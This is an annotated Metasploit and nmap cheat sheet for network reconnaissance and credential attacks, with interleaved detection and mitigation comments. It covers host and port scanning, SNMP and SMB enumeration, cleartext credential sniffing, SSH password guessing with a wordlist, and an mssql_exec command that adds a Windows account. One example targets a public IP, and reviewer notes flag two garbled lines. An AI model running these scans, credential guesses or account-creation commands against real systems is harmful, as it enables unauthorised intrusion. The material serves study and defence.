# Service/version scan (-sV) of the 192.168.1.0/24 range, launched from inside msfconsole.
# db_nmap wraps nmap and records the discovered hosts and services in the Metasploit
# database, so a database connection has to be active for the results to be kept.
db_nmap -sV 192.168.1.0/24
# 192.168.1.20-192.168.1.30, or 192.168.1.0/24,192.168.11.0/24 (scans two subnets)
# file:/root/host.txt (put the hosts to be scanned in this text file)
# Host discovery on the local segment: arp_sweep sends ARP requests for the addresses in
# RHOSTS and lists the hosts that answer. ARP is not routed, so this only sees hosts in
# the same broadcast domain as the chosen interface.
# Detection side: one MAC address requesting every address of a /24 in a short burst is
# the pattern ARP-scan alerts on switches and network IDS are built around.
use auxiliary/scanner/discovery/arp_sweep
# Interface the ARP requests are sent from.
msf6 auxiliary(scanner/discovery/arp_sweep) > set interface eth0
# Range to sweep.
msf6 auxiliary(scanner/discovery/arp_sweep) > set rhosts 192.168.0.0/24
# Number of concurrent scanner threads.
msf6 auxiliary(scanner/discovery/arp_sweep) > set threads 20
msf6 auxiliary(scanner/discovery/arp_sweep) > run
# TCP SYN port scan of a single host. PORTS is not set in these notes, so the module's
# default port range applies.
# NOTE(review): 114.115.165.18 is a publicly routable address, unlike the RFC 1918 ranges
# used in the neighbouring examples; it looks like a leftover from a specific test and
# would be better shown as a lab address.
use auxiliary/scanner/portscan/syn
msf6 auxiliary(scanner/portscan/syn) > set rhosts 114.115.165.18
# Number of concurrent scanner threads.
msf6 auxiliary(scanner/portscan/syn) > set threads 50
run
# ipidseq probes each host in RHOSTS and classifies how the IP ID field of its replies
# changes (for example incremental versus randomized).
# For a defender the finding is the host reported as incremental: a predictable IP ID is
# what lets a machine be used as the third party in an idle scan, and it usually points
# at an old or embedded network stack.
use auxiliary/scanner/ip/ipidseq
msf6 auxiliary(scanner/ip/ipidseq) > set rhosts 192.168.0.0/24
msf6 auxiliary(scanner/ip/ipidseq) > run
# -PN skips nmap's host-discovery step (older spelling of -Pn).
# NOTE(review): "-sl" is not an nmap option as written. Coming directly after ipidseq it
# was presumably meant to be the idle-scan option "-sI" (capital i), with 1.1.1.2 and
# 1.1.1.3 as placeholder addresses. Confirm against the original notes.
nmap -PN -sl 1.1.1.2 1.1.1.3
# UDP service discovery. Both modules send UDP probes to find listening UDP services.
# The notes only select the modules; no RHOSTS or other options are set and neither is run.
use auxiliary/scanner/discovery/udp_sweep
use auxiliary/scanner/discovery/udp_probe
# psnuffle is a passive sniffer: it watches traffic visible on an interface and extracts
# credentials from protocols that send them in cleartext. It returns nothing where the
# encrypted equivalents of those protocols are in use, which is the mitigation.
use auxiliary/sniffer/psnuffle
# SNMP enumeration against a lab target. The first line prepares the test machine; the
# modules are only selected here, with no options set.
# Lab setup only: binding snmpd to 0.0.0.0 exposes the agent on every interface of that host.
vi /etc/default/snmpd # On the test machine, change the listening address to 0.0.0.0
# Guesses SNMP community strings.
use auxiliary/scanner/snmp/snmp_login
# Reads system information through SNMP once a working community string is known.
use auxiliary/scanner/snmp/snmp_enum
# Lists user accounts that a Windows host exposes through SNMP.
use auxiliary/scanner/snmp/snmp_enumusers
# Lists shares that a Windows host exposes through SNMP.
use auxiliary/scanner/snmp/snmp_enumshares
# Hardening that defeats this group: no default community strings, SNMPv3 with
# authentication and privacy, and SNMP access limited to the management stations.
# SMB reconnaissance. The modules are only selected here; RHOSTS and any credentials
# would still have to be set before running them.
# Reports the SMB version and host details the server discloses.
use auxiliary/scanner/smb/smb_version
# Checks which named pipes can be reached over SMB.
use auxiliary/scanner/smb/pipe_auditor
# Checks which DCERPC services can be reached through a named pipe.
use auxiliary/scanner/smb/pipe_dcerpc_auditor
# Lists the shares the server offers.
use auxiliary/scanner/smb/smb_enumshares
# Lists user accounts known to the server.
use auxiliary/scanner/smb/smb_enumusers
# Enumerates accounts by looking up SIDs.
use auxiliary/scanner/smb/smb_lookupsid
# What these return without credentials depends on how much the host allows anonymous
# (null-session) access; restricting that access is the control that limits the output.
# SSH fingerprinting and credential testing.
# Reads the version banner the SSH server announces.
use auxiliary/scanner/ssh/ssh_version
# Tries username/password combinations against the SSH service.
use auxiliary/scanner/ssh/ssh_login
# USERPASS_FILE is a list of username/password pairs; this one ships with Metasploit.
set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
# Tests whether supplied private keys are accepted for accounts on the target.
use auxiliary/scanner/ssh/ssh_login_pubkey
# Detection and mitigation: a run of failed authentications from one source in the sshd
# log is the signature of ssh_login; key-only authentication and rate limiting of failed
# logins take away most of what a password list can achieve.
# Post-exploitation information gathering: enum_patches lists the patches installed on a
# Windows host. The original note below applies to this module.
use post/windows/gather/enum_patches
# This module has to be run through a session that has already been obtained.
# Microsoft SQL Server discovery, credential testing and command execution.
# Discovers SQL Server instances and the details they advertise.
use auxiliary/scanner/mssql/mssql_ping
# Tries credentials against SQL Server logins.
use auxiliary/scanner/mssql/mssql_login
# Runs an operating-system command on the database host through SQL Server; it needs
# valid credentials with enough privilege on the instance.
use auxiliary/admin/mssql/mssql_exec
# NOTE(review): the option name looks garbled on the page ("CMD.NET"); the module's
# option is CMD. Confirm against the original notes. The command text is a
# "net user ... /ADD", which creates a local account on the database host.
# Detection and mitigation: local account creation is logged as Windows Security event
# 4720; keeping xp_cmdshell disabled and running the SQL Server service under a
# low-privileged account limits what this module can do even with a valid login.
set CMD.NET user user pass /ADD
# FTP fingerprinting and login checks. The modules are only selected here, with no options set.
# Reads the banner the FTP server announces.
use auxiliary/scanner/ftp/ftp_version
# Check whether anonymous login is allowed.
use auxiliary/scanner/ftp/anonymous
# Password cracking (credential guessing against the FTP login).
use auxiliary/scanner/ftp/ftp_login